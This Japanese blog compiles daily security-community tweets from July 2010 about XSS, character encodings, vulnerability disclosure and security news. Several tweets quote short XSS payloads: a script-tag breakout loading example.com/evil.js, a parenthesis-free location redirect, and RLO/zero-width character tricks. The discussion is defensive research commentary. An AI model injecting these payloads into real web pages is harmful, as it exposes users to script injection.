ymzkei5: フォレンジックエバンジェリスト、すごい肩書き!@@; RT @netagent_jp: ネットエージェント公式ブログを更新しました。今回はフォレンジックエバンジェリスト 松本による「ファイルシステムとフォレンジックの話」です。 http://bit.ly/d9H9Gy



テーマ : セキュリティ
ジャンル : コンピュータ

7月8日のtwitterセキュリティクラスタ

昨日は専門家でもないのに脆弱性の報告と対応に追われてしまった1日でした。報告ごとにIPAが★でもくれたらいいのにな。


またまたまたIEのXSSです。こういうことをよく試して見つけますよね。
okomeki: UTF-7的なXSS脆弱性がieのiso-2022-jpで簡単に作れてみた

hasegawayosuke: 推測するに、エスケープシーケンス注入でISO-2022-JPと誤認させたうえで、「」として働く他の文字がある、ということかな。http://twitter.com/okomeki/status/15843402934

okomeki: @hoshikuzu @hasegawayosuke 特定文字がcp5022xで意図しないコードに化ける的なものです。バグになるのか仕様になるのか…

hoshikuzu: @hasegawayosuke いや、それは前に確認したけどなかった気がする。自信なし。というより、@okome さんがつぶやいたのでは、エライ簡単だということなので。(http://bit.ly/bs5rLI )「<」「>」として働く他の文字があるとは。

hasegawayosuke: 把握。

hoshikuzu: あー。なるほど。了解です。 RT @okomeki: @hoshikuzu @hasegawayosuke 特定文字がcp5022xで意図しないコードに化ける的なものです。バグになるのか仕様になるのか…

okomeki: .@hoshikuzu @hasegawayosuke Outlook Express の手元のでも同じ状態再現。Firefox/Opera等では化けずにcp5022x的にデコードされるので差異ができる。

hoshikuzu: IEのバージョン希望です。 RT @okomeki: Outlook Express の手元のでも同じ状態再現。Firefox/Opera等では化けずにcp5022x的にデコードされるので差異ができる。

okomeki: 6,7,8ですね RT @hoshikuzu: IEのバージョン希望です。 RT @okomeki: Outlook Express の手元のでも同じ状態再現。Firefox/Opera等では化けずにcp5022x的にデコードされるので差異ができる。



昨日アップデートがあったはずのツール蟹換に早くも不具合が。それにしても、楽しそうに開発されているので、まだまだよくなっていくのでしょうね。
port139: バイト列の途中に NULL とかのパターンがあると、その後ろにある日本語文字列が抜けちゃうのかぁ>かにかん 1.2.1。 MFT レコードとか貼り付けた時にちょっとアレだなぁ。

port139: 朝から蟹換の仕様について盛り上がっている二人(w

port139: ハングルも表示できるんだから、いっそフォントの選択もできた方がいいんぢゃね?とか、マルチライン対応とか、国際化とか、なぜそこまでという噂もある(w

port139: 蟹は生もの・・・ QT @fighting_pg 愉快な無茶振りを楽しみつつ、v1.2.1が数時間の寿命に終わりそうなことを少し残念に思う。



普通新版というのは旧版に問題があるから出るものですね。
connect24h: 初心者Webアプリケーション開発者がチェックすべき情報源を集めてみた。他に追加した方が良い情報源があった場合はご指摘いただけると助かります。http://ow.ly/28rrF

ockeghem: .@connect24h うわ、セキュアプログラミング講座の新版はだめと明記されている…って、ぼくも前にブログに書いたのだけど…旧版は旧版で問題ありますけどねぇ

tomoki0sanaki: @ockeghem 旧版もダメですか...orz (from 執筆陣の一人より) 2002年レベルではガンバったんですけど・・・



ACCSって常勤理事がこの人だけなんですね。
QualityCorp: 【JCSSA ソフトの不正利用を題材にセミナー ACCSの久保田裕氏が講演】 http://bit.ly/c2kw7p 久保田さんはウチのイベントにもよくお越しくださってまキュ!世界最高額の違法コピーが日本で発生した今日この頃、この手のイベントは熱くなりそうでキュね。



僕が大学生の頃に買ったときはソフト5本込みで3000円でした。あれは下界と遮断されるので、時間間隔がおかしくなります。注意しましょう。
eagle0wl: バーチャルボーイが欲しいのだが、3DS発表から地味に市場価格が上がってるような気がしないでもない。



もし買ったならお金払っちゃう気持ちはわかります。まず買うなと。
bakera: [メモ] こんな手口があるのですか……「児童ポルノ販売業者が摘発されまして、顧客名簿にあなたの名前が登録されておりました」。 http://www.yomiuri.co.jp/net/security/goshinjyutsu/20100205-OYT8T00885.htm



OAuthで株式取引ですか。楽なような怖いような。
gohsuket: おぉ! RT @sen_u: 証券会社で対応したとこがあるのか @kthrtty 海の向こうの証券会社(E*TRADE)がOAuthのSPに。アツい!証券会社が認証、市況、取引、通知APIを公開 http://bit.ly/9DJKTV http://bit.ly/9jDOkE




泣ける。今週ぼくが指摘したところは一瞬で直してきたのでびっくりしました。
mincemaker: IPA経由で報告した脆弱性がガン無視で泣ける。


一瞬で直してきたところはここ。Mac向けのサービスってリクープするのでしょうか。
risa_ozaki: BIGLOBE、Mac利用者向けのセキュリティサービスキャンペーンを開始: http://www.rbbtoday.com/article/2010/07/07/68967.html



岡崎市立中央図書館の話は、当事者を置いてきぼりにしてまだまだ盛り上がってる感じですが、一応脆弱性は修正されたらしいです。
bakera: 「愛知県 岡崎市立中央図書館の件につきまして、ウェブサイト運営者より、届出いただきました脆弱性に対する修正が完了したとの報告がありましたのでご連絡いたします」というメールが来ました。

bakera: 記号のみサニタイズする方法でXSSが修正されているようですね。SQLインジェクションの方は、TosCodeから数値以外の文字列をサニタイズしている模様。発想が完全にサニタイズ脳ですが……まあ、ともあれ私が報告した範囲については脆弱性はなくなっているように思います。

bakera: あ、良く見たら前の画面に戻るリンク自体が削除されているのですね。そういう直し方ですか……。いやまあ、確かに脆弱性はなくなりましたけれど、これでいいのかな。



そして、#librahackで暴れているあの人関連。直接バグを仕込んだわけじゃないらしいので、対応されてる方に悪いなあとか。

テーマ : セキュリティ
ジャンル : コンピュータ

7月7日のtwitterセキュリティクラスタ

このところゆうパックが大変なことになっているようですが、エクスパック500ばかりだったので(もちろん乾き物)よかったです。宅配便のネットワークが攻撃されたら、こんな状態に一瞬でなっちゃうのかと思うと、怖いなあとか思う今日この頃です。


目grepの話。これからのサイバー戦争においてgrepが使えない環境にも耐えうるように、目grep力を高める学校が出てきたりするのでしょうか。パターンの再認とかって人間の能力は意外と高かったはずですが、学んだのはもう昔のことなので忘れてしまいました。そういや某所の人たちはアナライザーに流れるネットワークフレームを見て何のデータかわかるのは基本だって言ってましたね。そんなものなのでしょう。
sonodam: しかし昔Jamesから聞いた話では、ログの高速スクロールをまさに目grepして怪しいところ指摘しているハッカー居たらしいからなあ。人間のパターン認識能力って、鍛えればまさにgrep程度にはなるってことか。

ikepyon: @sonodam レコード盤の溝を見るだけで、何のレコードかみ分ける人とか、カセットに録音されたプログラムを聞いて、何のプログラムか識別する人がいたようなw

bugbird: @sonodam 8086 のバイナリダンプをちらりと眺めて「ここからここまでがコードで、ここからデータ」と言ってた子がいたなぁ。例の「黒本」の筆者のひとりだったけど…

sonodam: まあ、そういう目grep的な実例を見ていると、人間の目(を鍛えること)に頼りたくなるのはわかりますよね。可視化とかも人間が見る前提ってのが多いもんなあ。

sonodam: でも逆に言えば、人間がガッツリ見なきゃいかんレベルのソリューションは、少々の手間を大仰な仕組みで省くだけって感じが否めないんだよなあ。



どんどん進化していきます。
Ji2Japan: フォレンジック調査チーム作成ツール / HEX文字列→可読文字列変換(試行)ツール「蟹換」で1バイトずらした試行をUnicode以外にも拡張、また、変換タイプが文字列のみの変換となりました。 http://bit.ly/5wpcAN



攻撃者がcookieを盗み、JavaScriptコードを仕込んでユーザーのWebブラウザで実行させることができてしまったらしいですが。よくわかんないですね。
bakera: [メモ] 解説の意味がちょっと不明。 http://www.itmedia.co.jp/news/articles/1007/06/news018.html


そういやたまたま見つけてDMで報告しようとしてるXSSですが、フォローしてくれないので報告できません。


そんなに嫌わなくてもいいと思いますが、ゲイツに捨てられたり、子供がMS社員にでもいじめられたりしたのでしょうか。
MasafumiNegishi: Microsoftに反発するグループ、未解決の脆弱性情報を公開 http://j.mp/9AbJhC



サポート期間が終わってもまだまだ脆弱性が報告されたりするとほったらかすわけにもいかないんですね。大企業って大変です。
MasafumiNegishi: RT マイクロソフト、「Windows XP」と「Windows 2000」の脆弱性を調査中 - http://j.mp/aXxeIS



jpcert: こんにちは。2010年4月1日から6月30日の活動をまとめた「インシデント報告対応レポート」と「活動概要」を公開しました。^YK https://www.jpcert.or.jp/update.html



またやってる。冗談でもあんまりやってると普通に訴えられると思うので、ちょっとそっちの方を期待したいと思います。
Hamachiya2: なにこのサイトこわい RT @boss_savage @twj http://bit.ly/bnCvwk このサイトでIDとパスワード入力した場合一度退会したほうがいいでしょうかパスワードと名前は変更しました。メールアドレスとパスワードも変更したのですがどうすればいいでしょうか

テーマ : セキュリティ
ジャンル : コンピュータ

7月6日のtwitterセキュリティクラスタ

今日は七夕ですね。ぼくも原稿の締め切りが延びますように。とお願いを書いておきましたが、延びたからといって何とかなるものでもないんですよね。これが。うそです。ニートなので仕事ください。


国際サイバー戦争的なことが起こってるらしいですね。これからは情報流出したらサイバー戦争に巻き込まれ中!スパイの仕業!というのがセキュリティの専門家からのオススメですよ。
FSECUREBLOG: スマートフォン・スパイ・ツールの使用により50人が逮捕: 「The Register」が、配偶者やライバル、何らかの動機から犠牲者として選ばれたその他の人々を、スマートフォン・スパイ・ツールを使用してスパイしたという理由で、ルーマニア… http://bit.ly/9d1Qfk

dry2: 事実かどうかは別にして、よく分からないものや、自分たちの失態もこのゴミ箱に放り込みそうだな。今後は、偽メール事件などの言い訳はこれが良いだろう。http://bit.ly/a6mCwx サイバー戦争で各国が火花



パスワード再発行の「ひみつの質問」に「好きなディズニーキャラクターは?」というのがあったディズニー携帯の話。ミッキーとかドナルドとか実質選択肢から選ぶようなものじゃあねえ。
bakera: [メモ] http://slashdot.jp/security/10/07/06/0814202.shtml



この夏は怪しいPNG画像が出回ったりするのでしょうか。
ikb: ほう。 libpng に脆弱性とな。しかも BOF。 #security: http://jvn.jp/cert/JVNVU643615/


ログに残るからじゃないでしょうか。普通の人はPOSTの送信データをブラックホールに吸い込んだりはしないものですから。
vulcain: パラメータを送るのにGETメソッドを使うメリットってなんだろうか?



Perlはテクニックもコードの書き方もこの10年ですっかり変わった気がします。たまに付いてこれてない人が昔のやり方でやっちゃってディスられるわけですが。
uzulla: なんつうか、Jcode.plと、ディレクトリロック(flock代替全般)が2010年にまで残っている事が残念でならない。



無償なりのツールですね。
tdaitoku: RT トレンドマイクロ、セキュリティ対策の無償ツールを一挙公開 http://www.itmedia.co.jp/enterprise/articles/1007/06/news063.html



なんか名前を見たことのある会社2つですが、Gumblarは今さらな気はします。。
tdaitoku: RT Gumblar型攻撃に対応したWAFサービス、セキュアブレインとSSTが提供 http://www.itmedia.co.jp/enterprise/articles/1007/06/news062.html



ぶっちゃけパスワードだけなら、それがなにかわかんないと思うのですよ。ユーザーIDとかURLとか余計なものがメモに書かれているのがまずいだけで。
miryu: 「パスワードを忘れないようにパソコンのモニタに付箋で貼り付けた」を無条件で「×」と答えてしまうのはちょっと待って欲しい。



「socks5プロキシ」を利用し、何千というフォロワーにスパムメッセージを送信することができる機能があるそうですよ。悪人すごいなあ。
MasafumiNegishi: RT スパム送信者の「Twitter」利用が思いのままに?「Twitter Kit」が登場! - http://j.mp/bxAQCh



これは面白そうなので期待したいです。
togakushi: 「超初心者向け正規表現講座:ボクはこうやって覚えた(下ネタ編)」とか需要あるかな?10分くらいで終わるけどw #ssmjp



学んでみたいけどお金がありません。
lac_security: 再掲:【脆弱性管理講座】脆弱性関連情報の読み方や取扱い方を学んでみませんか? まだ若干余裕があります。(^ま) http://www.lac.co.jp/event/20100714.html



テーマ : セキュリティ
ジャンル : コンピュータ

7月5日のtwitterセキュリティクラスタ

昨日は豪雨で隣の区を流れている石神井川が氾濫したみたいです。ネットセキュリティも大切だけど自宅のセキュリティも大切だよなと、以前集中豪雨のときに排水溝が詰まってたせいでベランダがプールみたいになった(しかも隙間から漏れて一階も大変なことに)私は思うのでありますよ。


引き続きセキュアプログラミング講座関連。直接JSは動かないけれども追加のJSは動くということですか。
ockeghem: .@masa141421356 ありがとうございます。でいけますね。元のJSはエラーになりますが、追加のスクリプトは動きますので。私は難しい方法ばかり考えていたようで

hoshikuzu: @ockeghem \ だけ使うのはどうでしょうか

hoshikuzu: @ockeghem あれ?私間違えたかな? \uNNNNのかたまりでスクリプトが動くブラウザがあったりなかったりという意味なのですが。

hoshikuzu: @ockeghem http://d.hatena.ne.jp/hoshikuzu/20080401#p3

hoshikuzu: @ockeghem 「...の内側において、「\uXXXX」だけで記述可能なブラウザがある。(Firefox)」なんて書いちゃっています。私。

ockeghem: .@hoshikuzu はい。括弧が使えない状況だったので、hoshikuzuさんのサイトも参考にさせていただきました。

hasegawayosuke: .@hoshikuzu @ockeghem Fx3.6、IE8、Chrome 5、Opera 10、Safari 5 http://utf-8.jp/PoC/uescape.html

ockeghem: .@hasegawayosuke ()が使いたいですねw


それに関連してUnicodeでの記載について。(は\u0028と記述はできないんですね。
hasegawayosuke: () を \u0028 \u0029 で書くとエラーでるのはなぜ? 調べる時間ないのであとで。

masa141421356: @hasegawayosuke 識別子名は \uxxxx で書いてもいいけど () は識別子じゃない。 http://www2u.biglobe.ne.jp/~oz-07ams/prog/ecma262r3/7_Lexical_Conventions.html

hoshikuzu: ものはついでで。 = と ( ) を取り除いてJavaScriptを作動させる技を最初に見た時には、背筋が寒くなりました。 だってさぁ、プロパティもメソッドも使えないジャン?

hoshikuzu: ~{ valueOf:location, toString:[].shift, 0:"http://example.com", length:1 }; // provided by thornmaker



昔北の国からのCWを傍受する仕事をしていた友人はスパイなんておるわけないやろとほざいてましたが、日本でも密かに行われてたりするんですかね。
yumano: サイバー戦争で各国が火花 - 朝鮮日報 http://www.chosunonline.com/news/20100705000008



このところ話題にすらのぼらないauも、証明書についてはあんまりよろしくない状況のようですね。
mitaken: 高木先生(@HiromitsuTakagi) が日記で触れていたのでauの証明書について調べた。識別名のCNに入る値はauのお客様コードを10桁になるように0埋めしたもの。契約の情報を接続先のサイトに送信するってのはどうだろうか。



実際にはjavascript:aleart("http://example.jp/?")と表示されますが、これでコードが実行できるようになったりするものですかねえ。
hasegawayosuke: ?? http://example.jp/?")?")trela:tpircsavaj ?



これからはサポートが終了した冷蔵庫は危険とか、自動車は危険とか、そんな時代がやってくるのかもしれません。
tamai_pc: IPA通知 「 サポートが終了したOSは危険です! 」 http://www.ipa.go.jp/security/txt/2010/07outline.html

テーマ : セキュリティ
ジャンル : コンピュータ

7月3~4日のtwitterセキュリティクラスタ

相変わらず週末はリアルで充実の日々を送る関係で、ツイートの少ないセキュリティクラスタです。私も今年初のかき氷なんかを食べたりしてネットとかあんまり見てないですよ。PC付けると暑いですしね。




あと7時間くらいですが、とりあえず出すのはタダなので(参加するのもタダですが)チャレンジしてみましょうよ。
hasegawayosuke: セキュリティ&プログラミングキャンプの応募締切は本日(7月5日)17:00必着ですよ。 #spcamp

sonodam: キャンプの内容って、講師自身が受けたいようなものを作ってるから、作ってる側も楽しいんだけどね(笑)。苦しいけど。とはいえセキュリティは今年けっこう変えちゃったけどね。#spcamp



引きこもりであまり使う機会はないのですが、ローミングで自分が何を使えるのかがよくわからなくなってきました。APの近所に住んでおけば日々のネット料金が安上がりですむのでうらやましいです。
mi1kman: 公衆無線LAN接続サービスもだんだん値下げされてきましたね

mi1kman: 公衆無線LAN接続サービスあちこちがローミングしてるので、分かりづらいですよね...



金曜日話題だったセキュアプログラミング講座ですが。貫通するコードが発表されています。
masa141421356: @ockeghem Firefoxだと <script> var a="//</script><script src=http://example.com/evil.js></script><script>"< /script> で陥落 > セキュアプログラミング講座



アカウントハックして自分のアプリ買うって… 誰がやったかモロバレですが、そんなに切羽詰まってたんですかねえ。アカウントってそれなりに簡単に手に入るとは思うのですが、それをバレないように使うのが大変なんだと思います。
iPad_news_tw: iTunesアカウントがハッキングされているとThe Next Webが報じる: MdN Design InteractiveThe Next Webは現地時間7月4日、iTunesのアカウントが広範囲にハッキングされて、特定の... http://bit.ly/chs2lq



名古屋とはあんまり関係ないような気はしますが。警察って自分たちよりは公務員の味方なんでしょうね。
keikuma: 読んだ。こりゃダメだ。新しい産業は愛知県からは生まれない。名古屋脱出して正解だったという感想。 RT @rocaz: ブログ書きました: とある件 #librahack に関連しつつ一般論を再度電話して聞いてみた http://goo.gl/fb/Vqbo9



一瞬クソニートカードと空目して、クソニートの僕でもカードが作れるのかとwktkしたのですが、それはともかくいったい何があったのでしょう。
HiromitsuTakagi: クソニーカードのせいで、あちこちの登録カード番号変更の作業で何時間も費やした。二度とソニー製品は買わんと決意。


テーマ : セキュリティ
ジャンル : コンピュータ

7月2日のtwitterセキュリティクラスタ

このところ毎日雨が降りそうで降らない寸止めな感じの天気でイライラも募ります。はっきりして欲しい今日この頃…


IPAのセキュアプログラミング講座(http://www.ipa.go.jp/security/awareness/vendor/programmingv2/web.html)のことだと思いますが… 言い出しっぺが書き直しをお願いされる予感。

ockeghem: セキュアプログラミング講座、見るんじゃなかった…

ockeghem: 『...の内側/その埋め込む値に次のような、スタイルの構文あるいはJavaScriptの構文として意味をもつ特殊記号が含まれないようにする。/ 引用符(「'」「"」「`」)/ セミコロン(「;」)/ コロン(「:」)/* 括弧(「(」「)」)等』

ockeghem: @ockeghem 発想がサニタイズだというのをおいといても、これじゃ貫通するorz



DOM Based XSSについて。必ずしもサーバサイドを経由する必要がないというのがポイントなんですね。
hoshikuzu: [sec]「Web 2.0的アプリなどでのAjaxの普及でJavaScriptが多用される現在のWeb開発では、DOM Based XSSが入り込む可能性は従来よりも高まっています。」と 進地さんが言っていたことを思い出した。

hoshikuzu: [sec] 『必ずしもサーバサイドを経由する必要がないという特徴』(進地さん)というのは、留意すべき観点かと。それゆえ、忘れがちであると。

hoshikuzu: [sec] http://www.ark-web.jp/blog/archives/2007/02/dom_based_xss.html

hasegawayosuke: DOM based XSSより、JSONをHTML扱いさせてのXSSのほうが多い。まあ、見つけやすいからというのもあるけど。

yumano: 拡散型XSS 試験型XSS RT @ikepyon: 反射型XSSと波動砲型XSSという馬鹿なものを思いついてしまったorz



最近面白い文字コード絡みです。xyzzyは取り扱えない文字があったり、コピペでおかしくなるのを何とかして欲しいなあ。
ockeghem: 𠮷田さんの尾骶骨

ockeghem: 結論:twitterはBMP外の文字を扱えるよだが、wassrだと何も表示されなくなる

ockeghem: 𠮷(いわゆる「つちよし」)はBMP外文字のチェックに好適ですね。辞書登録しました



Windows Help and Support Centerの脆弱性が疲れるようです。パッチの公開は未定って… 
QualityCorp: 【Windowsの未解決の脆弱性を突く攻撃が多発、MSが注意喚起】 http://bit.ly/cP0y1P 被害を受けたPCはもう1万台超。パッチの公開は未定だそうでキュ。



MVP発表の時期ですか。受賞したみなさまおめでとうございます。そういやセキュリティとはまったく関係ない仕事でMVPを創設された方にお会いしてびっくりした記憶があります。
yumano: おめでとう~!!パチパチ RT @nkanawa: ・・・。2010 Microsoft MVP 受賞なう…どうしよう、先輩たちにはるか遠く及ばないのに受賞しちゃった…。(((( ;゚д゚)))アワワワワ



クレジットカードのパスワードも破られちゃうのか… 怖いなあ。
akirakanaoka: 論文概要:クレジットカードで利用されているEMV署名。CRYPTO2009でそれに対する攻撃法。その時は特定条件下で攻撃計算量を見積もって「危険性少ない」と結論。だけどその条件だと甘い可能性。なので全ての条件下を検討した。結果、条件によっては現実的な時間で攻撃可能。 #isec



フリーでみんな使ってる奴ほど狙いたいものですよね。たとえが悪いですが、一回当たると大きいホームラン打てますし。
lac_security: 現場の一言。6月20日頃からe107に対するPHPコードインジェクションが増えている。このようなフリーのCMSに対するコードインジェクションは世の中に多数存在している。フリーは良い面もあればフリーであるから故に狙われている面もある。利用している方は気をつけてほしい。 (^あ)

テーマ : セキュリティ
ジャンル : コンピュータ

7月1日のtwitterセキュリティクラスタ

徳丸氏の日記に書かれた、PDOはSQLインジェクションの危険性があるから執筆中の書籍で紹介しないよということに対し、PDOに詳しい人たちからフォローが入って修正されていく様子です。twitterってすごいですね。



あと、セキュリティとは関係ないですが、「iPhoneアプリ開発できる方を探してます。エヴァカメラと同等の仕様で納期が明日昼と急ですがよろしくお願いします」もすごいですね。



こんな攻撃あるんですね。Connection: Closeを送らないからWebサーバーがずっとセッションを保持したままで、そのセッションが他の利用者のものになるということ?
drokubo: ハンドシェーク後、httpプロトコル確立までを攻撃者が未完にしておいて、正当な利用者のリクエストとがっちゃんこできる。? #csec50



SPFもウイルス感染した正当なドメインから送信されたメールは弾きようないですからねえ。
yumano: 熱心なスパム業者と怠慢なサーバ管理者の割合 RT @akirakanaoka: スパムの10%がSPF認証をパス。5%のハム(スパムじゃないメール)がSPFでSOFTFAILかREJECTに。 #icss12



XFS に対応したリカバリツールUFS Explorerについて。仕事って辛いなあと。
port139: XFS に対応したリカバリツールがあるんですねぇ、TeraStation とかで特に活躍しそうだ > UFS Explorer http://www.ufsexplorer.com/

kikuzou: @port139 ファイル名が戻らないため、大量にファイルがある場合は非常に辛いです。 from 実体験w

port139: @kikuzou あ、それって UFS Explorer で試されたってお話ですか?、XFS 上の削除ファイルについては、ファイル名不明な状態で出力されるという理解であってますでしょか? > ファイル名が戻らないため、大量にファイルがある場合は非常に辛いです。

kikuzou: @port139 「TeraStation上の削除ファイルを復旧したい」という依頼が来たときに、UFS Explorerを購入しました。私が作業した時は、ファイル名は数字の羅列となりました。http://twitpic.com/21dp69



ひどいなあ。そういや昔いた会社も和解してました。
QualityCorp: 【「過去最悪、全世界最高額の違法コピー」がBSA通報で発覚 ~ 関西所在の某メーカー、3億円超で和解】 http://bit.ly/baZqXg OfficeにIllustratorにAutoCADにFileMakerに…世界最高額とはひどいでキュ。



さすがに僕が社会人になったころはPCが一人1台ありましたが、諸先輩方に目の前に開発環境があるすごさをよく語られたものでした。ノートにコーディングとかしてたっていうんですものね。
ockeghem: 僕が社会人になったころは、まだ電算室にパンチャー(死語)がいて、かわいい子を選別していると評判だった。そして彼女たちの多くは、社員と結婚した。今は懐かしいエコシステム



このところさんざんUIDはアカン!といわれていたはずなのですが。
HiromitsuTakagi: まだこんなこと言ってる人がいるよ。→ http://www.phs-mobile.com/?p=730 「ウィルコムのUID通知はなぜできないのか」2010年7月1日



夏休みでしかもタダなんだから事後連絡でいいじゃない、と思う僕は夜遊びの過ぎる高校生だったなあ。
kensukesan: ブログ書きました→「応募時の保護者への説得材料」 http://www.famm.jp/wireless/modules/weblog/details.php?blog_id=327 #spcamp



テーマ : セキュリティ
ジャンル : コンピュータ

6月30日のtwitterセキュリティクラスタ

昨日面白かったのはこの流れ。未来ある若者が、文字コードのダークサイド、そして記号プログラムに引きずり込まれていく様子がつまびらかにされています。夏のキャンプでもこのようなイニシエーションが密室で繰り広げられていくのでしょうか。
mincemaker: U+202E 入れるなら元に戻す制御記号も入れないと

hasegawayosuke: .@otsune さんのことですね、わかります。 @mincemaker: U+202E 入れるなら元に戻す制御記号も入れないと。

mincemaker: @hasegawayosuke 参考文献: http://wassr.jp/user/hasegawa/statuses/rReUXHEQWo

yumano: @ucq 変数中にRLOとか

ucq: @yumano 自分で書いてたことあるけど、あれは混乱するw

yumano: @ucq 回文プログラミングでRLOを使うのはチートだよね

ucq: @yumano 実はjavascriptネタでこっそり使おうとしてましたw でもコピペしようとするとカーソルが変になるから気付かれちゃうんですよねー

ucq: ソースコードにRLO混ぜるとかよくあること。

hasegawayosuke: >JavaScriptだとスペースのかわりにZWNBSP(BOM)が使えるので見かけ上空白のないスクリプトとか書けますね。まあ、そもそもスペースなんてなくても問題なくJS書けるわけだけど。

ucq: ああ、ZERO WIDTH NO-BREAK SPACEか・・・

hasegawayosuke: あれだなー。@ucq がバイナリクラスタからテキストクラスタに乗り換えたみたいで嬉しいな。時代はtextですよ、おくさん。binaryなんて過去のもの!(言っちゃった

yumano: 両方ともとても狭いクラスタだと思ったw RT @hasegawayosuke: あれだなー。@ucq がバイナリクラスタからテキストクラスタに乗り換えたみたいで嬉しいな。時代はtextですよ、おくさん。binaryなんて過去のもの!(言っちゃった

hasegawayosuke: バイナリクラスタもテキストクラスタも人数少ないけど、記号プログラミングクラスタは今のところ日本には2人しかいないんだぜ! 3人目にようこそ!

ucq: もしかして:3人目=俺 RT @hasegawayosuke: バイナリクラスタもテキストクラスタも人数少ないけど、記号プログラミングクラスタは今のところ日本には2人しかいないんだぜ! 3人目にようこそ!

hasegawayosuke: 参考文献 http://d.hatena.ne.jp/ucq/20100416/1271404080 RT @ucq: もしかして:3人目=俺

ucq: テキストクラスタww

yumano: さらに記号クラスタとかに細分化されるのだろうか・・・ RT @ucq: テキストクラスタww

ucq: どうしてあんなコードを書いたか今の僕にはわからない。それにコードが読めないww



そして、文字コードがらみでもう1つ。デフォルトlatin1のアプリ死ね!とか思ったことはしばしばありました。
ockeghem: 日記書いた『ぼくがPDOを採用しなかったわけ(Shift_JISによるSQLインジェクション) 』 http://www.tokumaru.org/d/20100701.html#p01



日本語ロケールとか作って簡単に日本語化できるのかと思ったらそうでもないみたいですね。
port139: WiresharkのGUIって日本語にすることできるんですかね?とここで呟いても、きっと英語版で問題がない人ばかりだろうから意味ないか...なるべく初めて触る人の気分的な障壁を下げたいだけなんですけど。



昨日は初対面の人に野菜をもらいました。バイオテロかもしれない><と思ったら、奧さんが知り合いのご近所さんだったわけですが。
sen_u: そんな手口があるのか。 「ちわー、着払いの荷物ですー カードここにお願いします、あと暗証番号もお願いします詐欺が発生」 http://bit.ly/bcy8oR



回想はさておき、ゼロデイって怖いですが、結婚も怖いですよね。見合い結婚ってある意味ゼロデイです。
lac_security: 今週の洗い出しです。(^ま) Adobe Flash PlayerおよびReaderのゼロディ脆弱性を分析する その2  sen_u: 書き出しが自由すぐる。w RT @yarai1978: 今週のアライ出しが出来ました。 http://tinyurl.com/26dxz23

ockeghem: この強引さにしびれました>『「私のディケイド」に関する回想はさておき、前回の続きである』 RT @sen_u: 書き出しが自由すぐる。w RT @yarai1978: 今週のアライ出しが出来ました。 http://tinyurl.com/26dxz23


そして、上の記事でも解説されているとおりAdobe、コワイ、アップデート、ゼッタイ!
jpcert: Adobe Acrobat/Readerのバージョンアップを! 標的型攻撃がおきています。https://www.jpcert.or.jp/at/2010/at100017.txt ^KK



ソーシャルもコワイです。身近にゴミ箱を漁るのが趣味の人とかが、特にセキュリティ関連の人には意外といたりするものですから、いろいろ注意したいものです。
Murashima: IT利用の不正対策マニュアル:不正行為をする人物を調べる方法 - ITmedia エンタープライズ http://goo.gl/zQIe



クラウド間って暗号化されてないんですかね。パフォーマンス優先なんですかね。
lumin: 認証、暗号化なしと言えば強度がわかりますか? RT @yumano 分散系DBってセキュリティ的に弱いの?攻撃できるの?となんとなく思った



暗号解読に興味のある人はどうぞ。
tessy_jp: 7/17と24開催 > Panda Security Japan ブログ: Panda 暗号解読チャレンジ 2010エディション: 日程と詳細 <http://bit.ly/9NPd3Z


DNSSECって確かに同一性を担保するだけで他の要件にはいいことないですね。
bugbird: 正直、技術的にはきっぱりと DNS 2.0 を作る方が断然筋が良いんだと思うのですけどね。IPv6 のこれまでの迷走を見ているとそれも萎えちゃう

bugbird: DNSSEC は機密性(んなもの意味ねー)、同一性(これが命)、可用性(全く貢献できません)ということですからね。実はセキュリティという言葉はかなり不適切



キャプチャされても、長くてややこしい文字列なら、書き写すのに失敗したり入力に失敗したりする確率が高かったりするんれすよ(^q^) ノ
dry2: うーむ。古い注意喚起だが、、「FTPのパスワード(Yahoo! JAPAN IDのパスワード)を、他人に推測されにくい文字列に変更する。」ガンブラー対策でこれはないなぁ。 http://bit.ly/cRKbRM


テーマ : セキュリティ
ジャンル : コンピュータ

プロフィール

bogus

Author:bogus
FC2ブログへようこそ!

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
カレンダー
07-2010
SUN MON TUE WED THU FRI SAT
- - - - 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

06   08

上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。